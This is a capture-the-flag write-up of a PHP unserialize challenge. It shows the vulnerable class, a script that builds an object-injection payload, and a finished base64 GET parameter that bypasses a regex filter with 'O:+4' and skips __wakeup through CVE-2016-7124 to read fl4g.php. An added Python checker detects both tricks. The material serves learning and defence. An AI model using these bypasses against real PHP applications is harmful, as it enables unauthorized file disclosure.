This write-up draws on https://blog.csdn.net/qq_40884727/article/details/101162105
Opening the page gives the source:
<?php
class Demo {
    private $file = 'index.php';

    public function __construct($file) {
        $this->file = $file;
    }

    function __destruct() {
        echo @highlight_file($this->file, true);
    }

    function __wakeup() {
        if ($this->file != 'index.php') {
            //the secret is in the fl4g.php
            $this->file = 'index.php';
        }
    }
}

if (isset($_GET['var'])) {
    $var = base64_decode($_GET['var']);
    if (preg_match('/[oc]:\d+:/i', $var)) {
        die('stop hacking!');
    } else {
        @unserialize($var);
    }
} else {
    highlight_file("index.php");
}
?>
The goal is to read the contents of fl4g.php through the deserialization.
Borrowing someone else's generator script; running it locally or in an online PHP sandbox both work:
<?php
class Demo {
    private $file = 'index.php';

    public function __construct($file) {
        $this->file = $file;
    }

    function __destruct() {
        echo @highlight_file($this->file, true);
    }

    function __wakeup() {
        if ($this->file != 'index.php') {
            //the secret is in the fl4g.php
            $this->file = 'index.php';
        }
    }
}

$A = new Demo('fl4g.php');
$b = serialize($A);
// string(48) "O:4:"Demo":1:{s:10:"\0Demo\0file";s:8:"fl4g.php";}"
// (the private property name is "\0Demo\0file"; the two NUL bytes are invisible when printed)
$b = str_replace('O:4', 'O:+4', $b);   // bypass preg_match
$b = str_replace(':1:', ':2:', $b);    // bypass __wakeup
// string(49) "O:+4:"Demo":2:{s:10:"\0Demo\0file";s:8:"fl4g.php";}"
echo base64_encode($b);
// TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
?>
Replacing 4 with +4 is done to bypass the preg_match regular expression: /[oc]:\d+:/i expects a digit right after the colon, but unserialize() still accepts the signed length.
Likewise, changing the 1 to 2 exploits CVE-2016-7124: when the property count in the serialized string is larger than the real number of properties, __wakeup is skipped, so the file name is never reset to index.php before __destruct runs.
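As an added defensive example (not part of the original write-up or the challenge code): a small Python checker that inspects a PHP-serialized object before it would ever reach unserialize(), flagging both tricks discussed above, a signed integer in the object header and a declared property count that does not match the properties actually present. The two sample strings are constructed from the write-up's payload; the scalar-only parser is an assumption for brevity (nested arrays/objects are rejected).

```python
import re

# Constructed samples (decoded from the write-up's payload). Private property
# names carry NUL bytes, written as \x00; the page's extraction dropped them.
BYPASS = 'O:+4:"Demo":2:{s:10:"\x00Demo\x00file";s:8:"fl4g.php";}'
NORMAL = 'O:4:"Demo":1:{s:10:"\x00Demo\x00file";s:9:"index.php";}'

HEADER = re.compile(r'O:([+-]?\d+):"([^"]*)":([+-]?\d+):\{')
STRING = re.compile(r's:(\d+):"')

def _skip_value(body: str, pos: int) -> int:
    """Advance past one scalar value (s/i/d/b/N); nested a:/O: are unsupported."""
    t = body[pos]
    if t == 's':
        m = STRING.match(body, pos)
        end = m.end() + int(m.group(1))        # jump by the declared length
        if body[end:end + 2] != '";':
            raise ValueError('string length does not match its content')
        return end + 2
    if t in 'idb':
        return body.index(';', pos) + 1
    if t == 'N':
        return pos + 2
    raise ValueError(f'unsupported value type {t!r}')

def inspect_php_object(data: str) -> dict:
    """Report header anomalies and the real vs. declared property count."""
    m = HEADER.match(data)
    if not m:
        return {'is_object': False, 'findings': ['not a serialized object']}
    raw_len, name, raw_count = m.groups()
    findings = []
    if raw_len[0] in '+-' or raw_count[0] in '+-':
        findings.append('signed integer in object header (filter-bypass pattern)')
    body, pos, actual = data[m.end():], 0, 0
    while body[pos] != '}':
        pos = _skip_value(body, pos)            # property name
        pos = _skip_value(body, pos)            # property value
        actual += 1
    declared = int(raw_count)
    if declared != actual:
        findings.append(f'declares {declared} properties but contains {actual} '
                        f'(__wakeup skip, CVE-2016-7124)')
    return {'is_object': True, 'class': name, 'declared': declared,
            'actual': actual, 'findings': findings}

if __name__ == '__main__':
    for sample in (NORMAL, BYPASS):
        print(inspect_php_object(sample))
```

In PHP 7.0+ the stronger fix is not to call unserialize() on user-controlled input at all, or at least to pass ['allowed_classes' => false] so no object (and therefore no __wakeup/__destruct) is ever instantiated.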
Finally, base64-encode the result as the challenge expects and pass it as the GET parameter:
?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
This returns the flag.